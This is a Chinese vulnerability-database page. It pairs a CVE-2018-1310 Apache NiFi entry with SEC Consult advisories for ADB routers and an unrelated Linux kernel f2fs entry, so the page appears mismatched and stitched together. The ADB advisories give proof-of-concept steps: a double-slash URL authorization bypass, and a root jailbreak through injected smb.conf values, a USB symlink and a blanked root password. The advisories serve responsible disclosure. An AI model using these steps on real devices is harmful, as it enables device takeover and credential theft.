CVE-2018-1310
CVSS5.0
发布时间 :2018-05-23 10:29:00
修订时间 :2018-06-26 13:35:48
NMPS    

[原文]Apache NiFi JMS Deserialization issue because of ActiveMQ client vulnerability. Malicious JMS content could cause denial of service. See ActiveMQ CVE-2015-5254 announcement for more information. The fix to upgrade the activemq-client library to 5.15.3 was applied on the Apache NiFi 1.6.0 release. Users running a prior 1.x release should upgrade to the appropriate release.


[CNNVD]CNNVD数据暂缺。


[机译]译文暂缺.

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-502 [可信数据的反序列化]

- CPE (受影响的平台与产品)

cpe:/a:apache:nifi:0.2.1
cpe:/a:apache:nifi:0.3.0
cpe:/a:apache:nifi:0.4.0
cpe:/a:apache:nifi:0.4.1
cpe:/a:apache:nifi:0.5.0
cpe:/a:apache:nifi:0.5.1
cpe:/a:apache:nifi:0.6.0
cpe:/a:apache:nifi:0.6.1
cpe:/a:apache:nifi:0.7.2
cpe:/a:apache:nifi:0.7.4
cpe:/a:apache:nifi:1.4.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1310
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1310
(官方数据源) NVD

- 其它链接及资源

https://nifi.apache.org/security.html#CVE-2018-1310
(VENDOR_ADVISORY)  CONFIRM  https://nifi.apache.org/security.html#CVE-2018-1310

- 漏洞信息 (F148429)

ADB Authorization Bypass (PacketStormID:F148429)
2018-07-04 00:00:00
Johannes Greil  sec-consult.com
exploit,web
CVE-2018-13109
[点击下载]

Depending on the firmware version/feature-set of the ISP deploying the ADB device, a standard user account may not have all settings enabled within the web GUI. An authenticated attacker is able to bypass those restrictions by adding a second slash in front of the forbidden entry of the path in the URL. It is possible to access forbidden entries within the first layer of the web GUI, any further subsequent layers/paths (sub menus) were not possible to access during testing but further exploitation can't be ruled out entirely. Versions affected include ADB P.RG AV4202N, DV2210, VV2220, and VV5522.

SEC Consult Vulnerability Lab Security Advisory < 20180704-1 >
=======================================================================
              title: Authorization Bypass
            product: All ADB Broadband Gateways / Routers
                     (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
      fixed version: see "Solution" section below
         CVE number: CVE-2018-13109
             impact: critical
           homepage: http://www.adbglobal.com
              found: 2016-06-28
                 by: Johannes Greil (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."

Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast


Business recommendation:
------------------------
By exploiting the authorization bypass vulnerability on affected and unpatched
devices an attacker is able to gain access to settings that are otherwise
forbidden for the user, e.g. through strict settings set by the ISP. It is also
possible to manipulate settings to e.g. enable the telnet server for remote
access if it had been previously disabled by the ISP. The attacker needs some
user account, regardless of the permissions, for login, e.g. the default one
provided by the ISP or printed on the device can be used.


It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.


Vulnerability overview/description:
-----------------------------------
1) Authorization bypass vulnerability (CVE-2018-13109)
Depending on the firmware version/feature-set of the ISP deploying the ADB
device, a standard user account may not have all settings enabled within
the web GUI.

An authenticated attacker is able to bypass those restrictions by adding a
second slash in front of the forbidden entry of the path in the URL.
It is possible to access forbidden entries within the first layer of the web
GUI, any further subsequent layers/paths (sub menus) were not possible to access
during testing but further exploitation can't be ruled out entirely.


Proof of concept:
-----------------
1) Authorization bypass vulnerability (CVE-2018-13109)
Assume the following URL is blocked/forbidden within the web GUI settings:
http://$IP/ui/dboard/settings/management/telnetserver

Adding a second slash in front of the blocked entry "telnetserver" will enable
full access including write permissions to change settings:
http://$IP/ui/dboard/settings/management//telnetserver

This works for many other settings within the web GUI!


In our tests it was not possible to access subsequent layers, e.g.:
Assume that both the proxy menu and submenu "rtsp" settings are blocked,
a second slash will _not_ enable access to the RTSP settings:
http://$IP/ui/dboard/settings/proxy//rtsp

Nevertheless, it can't be ruled out that sub menus can be accessed too when
further deeper tests are being performed.


Vulnerable / tested versions:
-----------------------------
The following devices & firmware have been tested which were the most recent
versions at the time of discovery:

The firmware versions depend on the ISP / customer of ADB and may vary!

ADB P.RG AV4202N - E_3.3.0, latest firmware version, depending on ISP
ADB DV 2210 - E_5.3.0, latest firmware version, depending on ISP
ADB VV 5522 - E_8.3.0, latest firmware version, depending on ISP
ADB VV 2220 - E_9.0.6, latest firmware version, depending on ISP
etc.

It has been confirmed by ADB that _all_ their ADB modems / gateways / routers
based on the Epicentro platform are affected by this vulnerability in all
firmware versions for all their customers (ISPs) at the time of identification
of the vulnerability _except_ those devices which have a custom UI developed
for the ISP.


Vendor contact timeline:
------------------------
2016-07-01: Contacting vendor ADB, sending encrypted advisory, asking about
            affected devices
2016-07-08: Receiving information about affected devices
2016-07 - 2017-04: Further coordination, waiting for firmware release,
            implementation & rollout phases for their customers
2018-07-04: Embargo lifted, public release of security advisory


Solution:
---------
The firmware versions depend on the ISP / customer of ADB and may vary!

Patch version:

ADB P.RG AV4202N >= E_3.3.2, firmware version depending on ISP
ADB DV2210 >= E_5.3.2, firmware version depending on ISP
ADB VV5522 >= E_8.3.2, firmware version depending on ISP
ADB VV2220 >= E_9.3.2, firmware version depending on ISP
etc.


Workaround:
-----------
Restrict access to the web interface and only allow trusted users.
Change any default/weak passwords to strong credentials.
Don't allow remote access to the web GUI via Internet.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF J. Greil / @2018

    

- 漏洞信息 (F148424)

ADB Local Root Jailbreak (PacketStormID:F148424)
2018-07-04 00:00:00
Johannes Greil  sec-consult.com
exploit,local,root
CVE-2018-13108
[点击下载]

ADB broadband gateways and routers suffer from a local root jailbreak vulnerability via a network file sharing flaw. Versions affected include ADB P.RG AV4202N, DV2210, VV2220, and VV5522.

SEC Consult Vulnerability Lab Security Advisory < 20180704-0 >
=======================================================================
              title: Local root jailbreak via network file sharing flaw
            product: All ADB Broadband Gateways / Routers
                     (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
      fixed version: see "Solution" section below
         CVE number: CVE-2018-13108
             impact: critical
           homepage: http://www.adbglobal.com
              found: 2016-06-09
                 by: Johannes Greil (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."

Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast


Business recommendation:
------------------------
By exploiting the local root vulnerability on affected and unpatched devices
an attacker is able to gain full access to the device with highest privileges.
Attackers are able to modify any settings that might have otherwise been
prohibited by the ISP. It is possible to retrieve all stored user credentials
(such as VoIP) or SSL private keys. Furthermore, attacks on the internal network
side of the ISP are possible by using the device as a jump host, depending on
the internal network security measures.

Network security should not depend on the security of independent devices,
such as modems. An attacker with root access to such a device can enable
attacks on connected networks, such as administrative networks managed by the
ISP or other users.

It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.


Vulnerability overview/description:
-----------------------------------
1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)
Most ADB devices offer USB ports in order for customers to use them for
printer or file sharing. In the past, ADB devices have suffered from symlink
attacks e.g. via FTP server functionality which has been fixed in more recent
firmware versions.

The "Network File Sharing" feature of current ADB devices via USB uses a samba
daemon which accesses the USB drive with highest access rights and exports the
network shares with root user permissions. The default and hardcoded setting
for the samba daemon within the smb.conf on the device has set "wide links =
no" which normally disallows gaining access to the root file system of the
device using symlink attacks via a USB drive.

But an attacker is able to exploit both a web GUI input validation and samba
configuration file parsing problem which makes it possible to access the root
file system of the device with root access rights via a manipulated USB drive.

The attacker can then edit various system files, e.g. passwd and session
information of the web server in order to escalate web GUI privileges and
start a telnet server and gain full system level shell access as root.


This is a local attack and not possible via remote access vectors as an
attacker needs to insert a specially crafted USB drive into the device!
Usually not even the ISPs themselves have direct root access on ADB devices
hence this attack is quite problematic for further internal attacks.

It is possible to change network routes and attack networks and systems within
the internal network of the ISP or add backdoors or sniffers to the device.


Furthermore, attackers are able to gain access to all stored credentials,
such as PPP, wireless, CPE management or VoIP passwords.


Proof of concept:
-----------------
1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)
The samba configuration file (smb.conf) of the ADB devices has set the
following default settings. All file system operations will be performed
by the root user as set in the "force user" / "force group" setting of the
exported share:

    [global]
    netbios name = HOSTNAME
    workgroup = WORKGROUP
    wide links = no
    smb ports = 445 139
    security = share
    guest account = root
    announce version = 5.0
    socket options = TCP_NODELAY SO_RCVBUF=65536 SO_SNDBUF=65536
    null passwords = yes
    name resolve order = hosts wins bcast
    wins support = yes
    syslog only = yes
    read only = no
    hosts allow =  192.168.1.1/255.255.255.0
    [share]
    path = /mnt/sdb1/.
    read only = false
    force user = root
    force group = root
    guest ok = yes



An attacker can edit various values such as "netbios name" and "workgroup" via
the web GUI. The web GUI does some basic filtering and newlines are
unfortunately not allowed (the samba config file is line-based) hence a
special bypass has been crafted in order to change the default setting "wide
links = no" to "wide links = yes". This enables symlinks to the root file
system.

By using the following netbios name and workgroup, samba can be tricked into
allowing symlinks to the root file system of the device:
netbios domain / workgroup = =wide links = yes \  \
netbios name = wide links = yes \

Relevant HTTP POST parameters:
&domainName==wide links = yes \  \ &hostName=wide+links+%3D+yes+%5C


According to the manpage of smb.conf, any line ending in a \ is continued by the
samba parser on the next line. Furthermore, it states that "Only the first
equals sign in a parameter is significant." - which it seems can be bypassed
by adding a backslash \. The parser now thinks that the "wide links = yes" has
been set and omits the hardcoded "wide links = no" which comes further down
below in the smb.conf file.


In order to add those special values within the web GUI a proxy server such as
burp proxy is needed because of basic input validation on the client side (not
server side).


The USB drive needs to be formatted to ext2 or ext3 which is supported by
the ADB device. Then create a symlink to the root file system via the
following command on the attacker's computer:
    ln -s / /path/to/usbdevice/rootfs

After those settings have been changed and the USB drive has been set up,
the USB drive can be inserted into the ADB device. The USB volume needs to be
exported (with read/write permissions) as a share via the web GUI. Afterwards
it can be accessed over the network and the "rootfs" folder example from above
will give an attacker access to the ADB root file system with "read & write"
access permissions as root.

Most file systems / partitions on the device are mounted read-only per default,
but the most important one "/tmp" contains all settings and is mounted writable
for operations.


The defaut user "admin" usually has little access rights during normal
operations which can be changed by manipulating the session file of the web
server within /tmp/ui_session_XXX where XXX is the session id of the currently
logged on user, e.g. change:
from: access.dboard/settings/management/telnetserver =|> 2001
to: access.dboard/settings/management/telnetserver =|> 2220
etc. (or change all entries for maximum access level)


This way, an attacker can give himself all/highest access permissions within
the GUI and change all the settings of the device! Hence the telnet or SSH
server can be started even though they might have been disabled by the ISP.
Furthermore, the /tmp/passwd file has to be changed in order to allow root
access via shell/telnet:
change: root:*:0:0:root:/root:/bin/ash
to: root::0:0:root:/root:/bin/ash

Now telnet into the device with root and no password.
Example of an ADB DV2210 device:

Trying $IP...
Connected to $IP.
Escape character is '^]'.
Login root:


BusyBox v1.17.3 (2016-02-11 13:34:33 CET) built-in shell (ash)
Enter 'help' for a list of built-in commands.

      ___           ___           ___           ___
     |\__\         /\  \         /\  \         /\  \
     |:|  |       /::\  \       /::\  \       /::\  \
     |:|  |      /:/\:\  \     /:/\:\  \     /:/\:\  \
     |:|__|__   /::\~\:\  \   /::\~\:\  \   _\:\~\:\  \
     /::::\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ /\ \:\ \:\__\
    /:/~~/~    \/__\:\/:/  / \/__\:\/:/  / \:\ \:\ \/__/
   /:/  /           \::/  /       \::/  /   \:\ \:\__\
   \/__/            /:/  /         \/__/     \:\/:/  /
                   /:/  /                     \::/  /
                   \/__/                       \/__/
..................................................................
 yet another purposeful solution by             A D B   Broadband
..................................................................
root@$hostname:~# id
uid=0(root) gid=0(root) groups=0(root)
root@$hostname:~#



Vulnerable / tested versions:
-----------------------------
The following devices & firmware have been tested which were the most recent
versions at the time of discovery.

The firmware versions depend on the ISP / customer of ADB and may vary!

ADB P.RG AV4202N - E_3.3.0, latest firmware version, depending on ISP
ADB DV 2210 - E_5.3.0, latest firmware version, depending on ISP
ADB VV 5522 - E_8.3.0, latest firmware version, depending on ISP
ADB VV 2220 - E_9.0.6, latest firmware version, depending on ISP
etc.

It has been confirmed by ADB that _all_ their ADB modems / gateways / routers
based on the Epicentro platform with USB ports and network file sharing
features are affected by this vulnerability in all firmware versions for all
their customers (ISPs) at the time of identification of the vulnerability.


Vendor contact timeline:
------------------------
2016-06-15: Contacting vendor ADB, exchanging encryption keys & advisory
            Asking about affected devices / firmware, timeline for hotfix
            Fast initial response from ADB providing requested information
2016-06-16: Asking about other affected devices
2016-06-17: Resending previous question due to encryption problems
2016-07-04: Conference call
2016-07 - 2017-04: Further coordination, waiting for firmware release,
            implementation & rollout phases for their customers
2018-07-04: Embargo lifted, public release of security advisory


Solution:
---------
The firmware versions depend on the ISP / customer of ADB and may vary!

Patch version:

ADB P.RG AV4202N >= E_3.3.2, firmware version depending on ISP
ADB DV2210 >= E_5.3.2, firmware version depending on ISP
ADB VV5522 >= E_8.3.2, firmware version depending on ISP
ADB VV2220 >= E_9.3.2, firmware version depending on ISP

Centro Business 1  >= 7.12.10
Centro Business 2  >= 8.06.08

etc.


Workaround:
-----------
Restrict access to the web interface and only allow trusted users.
Change any default/weak passwords to strong credentials.
Don't allow remote access to the web GUI via Internet.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF J. Greil / @2018

    

- 漏洞信息

Linux Kernel 'fs/f2fs/super.c' Local Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 104679
No Yes
2018-06-22 12:00:00 2018-06-22 12:00:00
Wen Xu

- 受影响的程序版本

Linux kernel 4.17.3
Linux kernel 4.17.2
Linux kernel 4.17.1
Linux kernel 4.16.11
Linux kernel 4.16.9
Linux kernel 4.16.6
Linux kernel 4.16.3
Linux kernel 4.15.14
Linux kernel 4.15.11
Linux kernel 4.15.9
Linux kernel 4.15.4
Linux kernel 4.14.31
Linux kernel 4.14.13
+ EnGarde Secure Linux 1.0.1
+ Immunix Immunix OS 7+
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ SuSE Linux 7.0
+ SuSE Linux 6.4
+ SuSE Linux 6.3
+ Trustix Secure Linux 1.5
Linux kernel 4.14.11
Linux kernel 4.14.10
Linux kernel 4.14.6
Linux kernel 4.14.5
Linux kernel 4.14.1
Linux kernel 4.13.11
Linux kernel 4.13.10
Linux kernel 4.13.8
Linux kernel 4.13.7
Linux kernel 4.13.6
Linux kernel 4.13.4
Linux kernel 4.13.3
Linux kernel 4.12.9
Linux kernel 4.12.3
Linux kernel 4.12.2
Linux kernel 4.11.9
Linux kernel 4.11.5
Linux kernel 4.11.4
Linux kernel 4.11.3
Linux kernel 4.11.2
Linux kernel 4.11.1
Linux kernel 4.11
Linux kernel 4.10.15
Linux kernel 4.10.13
Linux kernel 4.10.12
Linux kernel 4.10.10
Linux kernel 4.10.6
Linux kernel 4.10.4
Linux kernel 4.10
Linux kernel 4.1.47
Linux kernel 4.1.4
Linux kernel 4.1.1
Linux kernel 4.0.6
Linux kernel 3.19.3
Linux kernel 3.18.22
Linux kernel 3.18.17
Linux kernel 3.18.11
Linux kernel 3.18.8
Linux kernel 3.18.7
Linux kernel 3.18.3
Linux kernel 3.18.2
Linux kernel 3.18.1
Linux kernel 3.17.4
Linux kernel 3.17.2
Linux kernel 3.16.7
Linux kernel 3.16.2
Linux kernel 3.16.1
Linux kernel 3.15.10
Linux kernel 3.15.5
Linux kernel 3.15.2
Linux kernel 3.14.54
Linux kernel 3.14.45
Linux kernel 3.14.37
Linux kernel 3.14.4
Linux kernel 3.14.3
Linux kernel 3.14.2
Linux kernel 3.13.11
Linux kernel 3.13.9
Linux kernel 3.13.3
Linux kernel 3.13.1
Linux kernel 3.12.49
Linux kernel 3.12.48
Linux kernel 3.12.44
Linux kernel 3.12.40
Linux kernel 3.12.21
Linux kernel 3.12.18
Linux kernel 3.12.17
Linux kernel 3.12.16
Linux kernel 3.12.11
Linux kernel 3.12.7
Linux kernel 3.12.4
Linux kernel 3.12.3
Linux kernel 3.12.2
Linux kernel 3.11.3
Linux kernel 3.10.90
Linux kernel 3.10.81
Linux kernel 3.10.73
Linux kernel 3.10.45
Linux kernel 3.10.41
Linux kernel 3.10.38
Linux kernel 3.10.37
Linux kernel 3.10.36
Linux kernel 3.10.30
Linux kernel 3.10.27
Linux kernel 3.10.26
Linux kernel 3.10.23
Linux kernel 3.10.22
Linux kernel 3.10.21
Linux kernel 3.10.14
Linux kernel 3.10.10
Linux kernel 3.10.9
Linux kernel 3.10.7
Linux kernel 3.10
Linux kernel 3.8.9
Linux kernel 3.8.6
Linux kernel 3.8.5
Linux kernel 3.8.4
Linux kernel 3.8.2
Linux kernel 3.8.1
Linux kernel 3.7.10
Linux kernel 3.7.9
Linux kernel 3.7.8
Linux kernel 3.7.7
Linux kernel 3.7.5
Linux kernel 3.7.4
Linux kernel 3.7.3
Linux kernel 3.7.2
Linux kernel 3.7.1
Linux kernel 3.6.11
Linux kernel 3.6.10
Linux kernel 3.6.9
Linux kernel 3.6.8
Linux kernel 3.6.7
Linux kernel 3.6.6
Linux kernel 3.6.5
Linux kernel 3.6.4
Linux kernel 3.6.3
Linux kernel 3.6.2
Linux kernel 3.6.1
Linux kernel 3.5.7
Linux kernel 3.5.6
Linux kernel 3.5.5
Linux kernel 3.5.4
Linux kernel 3.5.3
Linux kernel 3.5.2
Linux kernel 3.5.1
Linux kernel 3.4.88
Linux kernel 3.4.87
Linux kernel 3.4.86
Linux kernel 3.4.80
Linux kernel 3.4.76
Linux kernel 3.4.73
Linux kernel 3.4.72
Linux kernel 3.4.71
Linux kernel 3.4.64
Linux kernel 3.4.58
Linux kernel 3.4.42
Linux kernel 3.4.36
Linux kernel 3.4.32
Linux kernel 3.4.31
Linux kernel 3.4.27
Linux kernel 3.4.26
Linux kernel 3.4.25
Linux kernel 3.4.21
Linux kernel 3.4.20
Linux kernel 3.4.19
Linux kernel 3.4.18
Linux kernel 3.4.17
Linux kernel 3.4.16
Linux kernel 3.4.15
Linux kernel 3.4.14
Linux kernel 3.4.13
Linux kernel 3.4.12
Linux kernel 3.4.11
Linux kernel 3.4.10
Linux kernel 3.4.9
Linux kernel 3.4.8
Linux kernel 3.4.7
Linux kernel 3.4.6
Linux kernel 3.4.5
Linux kernel 3.4.4
Linux kernel 3.4.3
Linux kernel 3.4.2
Linux kernel 3.4.1
Linux kernel 3.3.5
Linux kernel 3.3.4
Linux kernel 3.3.2
Linux kernel 3.2.82
Linux kernel 3.2.72
Linux kernel 3.2.62
Linux kernel 3.2.57
Linux kernel 3.2.56
Linux kernel 3.2.51
Linux kernel 3.2.24
Linux kernel 3.2.23
Linux kernel 3.2.13
Linux kernel 3.2.12
Linux kernel 3.2.9
Linux kernel 3.2.1
Linux kernel 3.1.8
Linux kernel 3.0.98
Linux kernel 3.0.75
Linux kernel 3.0.72
Linux kernel 3.0.69
Linux kernel 3.0.65
Linux kernel 3.0.60
Linux kernel 3.0.59
Linux kernel 3.0.58
Linux kernel 3.0.37
Linux kernel 3.0.34
Linux kernel 3.0.5
Linux kernel 3.0.4
Linux kernel 3.0.2
Linux kernel 3.0.1
Linux kernel 2.6.39
Linux kernel 2.6.38
Linux kernel 2.6.37
Linux kernel 2.6.36
Linux kernel 2.6.35
Linux kernel 2.6.34
Linux kernel 2.6.33
Linux kernel 2.6.32 .9
Linux kernel 2.6.32
Linux kernel 2.6.31
Linux kernel 2.6.29
Linux kernel 2.6.28
Linux kernel 2.6.27
Linux kernel 2.6.26
Linux kernel 2.6.25
Linux kernel 2.6.24
Linux kernel 2.6.23
Linux kernel 4.4.14
Linux kernel 4.4.1
Linux kernel 4.4.0-57
Linux kernel 4.16-rc7
Linux kernel 4.16-rc6
Linux kernel 4.16-rc
Linux kernel 4.16
Linux kernel 4.15.8
Linux kernel 4.15.7
Linux kernel 4.15.16
Linux kernel 4.15-rc5
Linux kernel 4.15
Linux kernel 4.14.8
Linux kernel 4.14.7
+ EnGarde Secure Linux 1.0.1
+ Immunix Immunix OS 7+
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ SuSE Linux 7.0
+ SuSE Linux 6.4
+ SuSE Linux 6.3
+ Trustix Secure Linux 1.5
Linux kernel 4.14.4
Linux kernel 4.14.3
Linux kernel 4.14.2
Linux kernel 4.14.15
Linux kernel 4.14.14
Linux kernel 4.14.0-rc1
Linux kernel 4.14-rc5
Linux kernel 4.14-rc1
Linux kernel 4.14
Linux kernel 4.13.5
Linux kernel 4.13.2
Linux kernel 4.13.1
Linux kernel 4.13
Linux kernel 4.12.10
Linux kernel 4.12.1
Linux kernel 4.12
Linux kernel 4.11.8
Linux kernel 4.11.7
Linux kernel 4.11
Linux kernel 4.10.9
Linux kernel 4.10.8
Linux kernel 4.10.7
Linux kernel 4.10.5
Linux kernel 4.10.3
Linux kernel 4.10.2
Linux kernel 4.10.11
Linux kernel 4.10.1
Linux kernel 4.1.15
Linux kernel 4.1
Linux kernel 4.0.5
Linux kernel 4.0
Linux kernel 3.8
Linux kernel 3.7.6
Linux kernel 3.7
Linux kernel 3.6
Linux kernel 3.5
Linux kernel 3.4.93
Linux kernel 3.4.81
Linux kernel 3.4.70
Linux kernel 3.4.67
Linux kernel 3.4.29
Linux kernel 3.4
Linux kernel 3.3
Linux kernel 3.2.81
Linux kernel 3.2.78
Linux kernel 3.2.65
Linux kernel 3.2.64
Linux kernel 3.2.63
Linux kernel 3.2.60
Linux kernel 3.2.55
Linux kernel 3.2.54
Linux kernel 3.2.53
Linux kernel 3.2.52
Linux kernel 3.2.50
Linux kernel 3.2.44
Linux kernel 3.2.42
Linux kernel 3.2.38
Linux kernel 3.2.2
Linux kernel 3.2
Linux kernel 3.19
Linux kernel 3.18.9
Linux kernel 3.18
Linux kernel 3.17.6
Linux kernel 3.17
Linux kernel 3.16.6
Linux kernel 3.16.36
Linux kernel 3.16
Linux kernel 3.15
Linux kernel 3.14.73
Linux kernel 3.14.7
Linux kernel 3.14.5
Linux kernel 3.14-4
Linux kernel 3.14-1
Linux kernel 3.14
Linux kernel 3.13.7
Linux kernel 3.13.6
Linux kernel 3.13.5
Linux kernel 3.13.4
Linux kernel 3.13.0
Linux kernel 3.13
Linux kernel 3.12.22
Linux kernel 3.12.15
Linux kernel 3.12.14
Linux kernel 3.12.12
Linux kernel 3.12.1
Linux kernel 3.12
Linux kernel 3.11.9
Linux kernel 3.11.6
Linux kernel 3.11
Linux kernel 3.10.5
Linux kernel 3.10.43
Linux kernel 3.10.31
Linux kernel 3.10.20
Linux kernel 3.10.17
Linux kernel 3.10
Linux kernel 3.1
Linux kernel 3.0.66
Linux kernel 3.0.62
Linux kernel 3.0.18
Linux kernel 3.0
Linux kernel 2.6.38.6
Linux kernel 2.6.38.4
Linux kernel 2.6.38.3
Linux kernel 2.6.38.2
Linux kernel 2.6.37.2
Linux kernel 2.6.32.8
Linux kernel 2.6.32.7
Linux kernel 2.6.32.62
Linux kernel 2.6.32.61
Linux kernel 2.6.32.60
Linux kernel 2.6.32.6
Linux kernel 2.6.32.5
Linux kernel 2.6.32.3
Linux kernel 2.6.32.28
Linux kernel 2.6.32.15
Linux kernel 2.6.32.14
Linux kernel 2.6.32.13
Linux kernel 2.6.32.12
Linux kernel 2.6.32.11
Linux kernel 2.6.32.10
Linux kernel 2.6.32.1
Linux kernel 2.6.31.6
Linux kernel 2.6.31.4
Linux kernel 2.6.31.1
Linux kernel 2.6.30.5
Linux kernel 2.6.30.4
Linux kernel 2.6.30.3
Linux kernel 2.6.28.4
Linux kernel 2.6.28.10
Linux kernel 2.6.27.54
Linux kernel 2.6.27.51
Linux kernel 2.6.27.49
Linux kernel 2.6.27.26
Linux kernel 2.6.26.1
Linux kernel 2.6.25.4
Linux kernel 2.6.25.3
Linux kernel 2.6.25.2
Linux kernel 2.6.25.1
Linux kernel 2.6.24.6
Linux kernel 2.6.24.4
Linux kernel 2.6.24.3
Linux kernel 2.6.23.14
Linux kernel 2.6.23.10
Linux kernel 2.6.23.1

- 漏洞讨论

- 漏洞利用

Currently, we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 解决方案

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站